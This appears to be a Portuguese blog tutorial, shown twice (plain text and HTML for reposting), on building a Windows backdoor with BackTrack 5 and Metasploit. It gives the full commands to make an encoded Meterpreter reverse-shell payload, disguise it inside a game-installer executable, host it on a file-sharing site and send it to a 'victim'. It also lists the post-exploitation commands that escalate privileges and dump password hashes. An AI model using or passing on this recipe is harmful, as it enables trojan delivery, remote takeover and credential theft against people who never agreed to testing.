BackTrack 5 - Metasploit x Windows

Um simples backdoor com o BT5 para realizar um pentest no windows
-
Vamos simular que o windows XP ( sp3 ) tenha o IP - 192.168.1.5 ( Para ver o ip digite ipconfig no prompt de comando )
O backtrack 5 tenha o IP - 192.168.1.6 ( Para ver o ip digite ifconfig no terminal )
-
Começando:

1 - Abra o terminal do Backtrack 5
2
- O código abaixo para gerar o arquivo.exe que irá fazer a conexão
entre os dois computadores através da própria shell do linux.

Código:

# msfpayload
windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=1234 R |
msfencode -t exe -x Desktop/file.exe -k -o Desktop/realfile.exe -c
x86/shikata_ga_nai -c 5

O comando acima pode ser alterado, exemplo:

# msfpayload
windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=5050 R |
msfencode -t exe -x /etc/instalar.exe -k -o Desktop/instalarjogo.exe -c
x86/shikata_ga_nai -c 5

Feito isso, irá gerar o .exe, deixe ele de lado por enquanto.

Agora no terminal digite:

# msfconsole

De a sequência de comandos:

use exploit/multi/handler
set meterpreter/reverse_tcp
set LHOST 192.168.1.6
set LPORT 1234 ( se vc já sabe usar, fica a escolha )
exploit

Deixa esse terminal de lado agora, e abra
o navegador, vá em algum site para hospedar o arquivo.exe que foi
gerado, megaupload ou depositfiles fica a sua escolha.
Depois
de hospedar envie para o windows xp ( vitima ), no momento que ela
executar veja agora o terminal no backtrack se a caso deu certo vai
aparecer o meterpreter >
-
meterpreter >
Ai será digitados uma sequência de comandos, veja as informações de cada uma delas até o hashdump.
ps
Veja o system32 - 1660
Agora digite alguns comandos:

migrate 1660
getuid
getsystem
getuid
sysinfo
hashdump

Os comandos são simples, como sysinfo mostrar a versão do windows e por ai vai, digite help para ver cada um. 

Gostou? Então copie esse post para seu Blog:
Um simples backdoor com o BT5 para realizar um pentest no windows<br /> -<br /> <span style="font-weight: bold;">Vamos simular que o windows XP ( sp3 ) tenha o IP - </span><span style="color: red; font-weight: bold;">192.168.1.5</span><span style="font-weight: bold;"> ( Para ver o ip digite ipconfig no prompt de comando )</span><br /> <span style="font-weight: bold;">O backtrack 5 tenha o IP - </span><span style="color: red; font-weight: bold;">192.168.1.6</span><span style="font-weight: bold;"> ( Para ver o ip digite ifconfig no terminal )</span><br /> <span style="font-weight: bold;">-</span><br /> <span style="font-weight: bold;">Começando:</span><br /> <br /> <span style="font-weight: bold;">1 - Abra o terminal do Backtrack 5</span><br /> <span style="font-weight: bold;">2<br /> - O código abaixo para gerar o arquivo.exe que irá fazer a conexão <br />entre os dois computadores através da própria shell do linux.</span><br /> <br /> <span style="font-weight: bold;">Código:</span><br /> <br /> <span style="font-weight: bold;"># </span><span style="color: red; font-weight: bold;">msfpayload<br /> windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=1234 R | <br />msfencode -t exe -x Desktop/file.exe -k -o Desktop/realfile.exe -c <br />x86/shikata_ga_nai -c 5</span><br /> <br /> <div class="MMB"> <span style="font-weight: bold;">O comando acima pode ser alterado, exemplo:</span><br /> <br /> <span style="font-weight: bold;">#<span style="color: red;"> </span></span><span style="color: #330000; font-weight: bold;">msfpayload<br /> windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=5050 R | <br />msfencode -t exe -x /etc/instalar.exe -k -o Desktop/instalarjogo.exe -c <br />x86/shikata_ga_nai -c 5</span><br /> <br /> <span style="font-weight: bold;">Feito isso, irá gerar o .exe, deixe ele de lado por enquanto.</span><br /> <br /> <span style="font-weight: bold;">Agora no terminal digite:</span><br /> <br /> <span style="font-weight: bold;"># </span><span style="color: red; font-weight: bold;">msfconsole</span><br /> <br /> <span style="font-weight: bold;">De a sequência de comandos:</span><br /> <br /> <span style="color: red; font-weight: bold;">use exploit/multi/handler</span><br /> <span style="color: red; font-weight: bold;">set meterpreter/reverse_tcp</span><br /> <span style="color: red; font-weight: bold;">set LHOST 192.168.1.6</span><br /> <span style="color: red; font-weight: bold;">set LPORT 1234<span style="color: black;"> ( se vc já sabe usar, fica a escolha )</span></span><br /> <span style="color: red; font-weight: bold;">exploit</span></div> <div class="MMB"> </div> <div class="MMB"> <span style="font-weight: bold;">Deixa esse terminal de lado agora, e abra<br /> o navegador, vá em algum site para hospedar o arquivo.exe que foi <br />gerado, megaupload ou depositfiles fica a sua escolha.</span><br /> <span style="font-weight: bold;">Depois<br /> de hospedar envie para o windows xp ( vitima ), no momento que ela <br />executar veja agora o terminal no backtrack se a caso deu certo vai <br />aparecer o meterpreter > </span><br /> <span style="font-weight: bold;">-</span><br /> <span style="color: red; font-weight: bold;">meterpreter ></span><br /> <span style="font-weight: bold;">Ai será digitados uma sequência de comandos, veja as informações de cada uma delas até o hashdump.</span><br /> <span style="color: red; font-weight: bold;">ps</span><br /> <span style="font-weight: bold;">Veja o system32 - 1660</span><br /> <span style="font-weight: bold;">Agora digite alguns comandos:</span><br /> <br /> <span style="color: red; font-weight: bold;">migrate 1660</span><br /> <span style="color: red; font-weight: bold;">getuid</span><br /> <span style="color: red; font-weight: bold;">getsystem</span><br /> <span style="color: red; font-weight: bold;">getuid</span><br /> <span style="color: red; font-weight: bold;">sysinfo</span><br /> <span style="color: red; font-weight: bold;">hashdump</span><br /> <br /> <span style="font-weight: bold;"><wbr></wbr>Os comandos são simples, como sysinfo mostrar a versão do windows e por ai vai, digite help para ver cada um.</span><span style="color: red; font-weight: bold;"> </span> </div>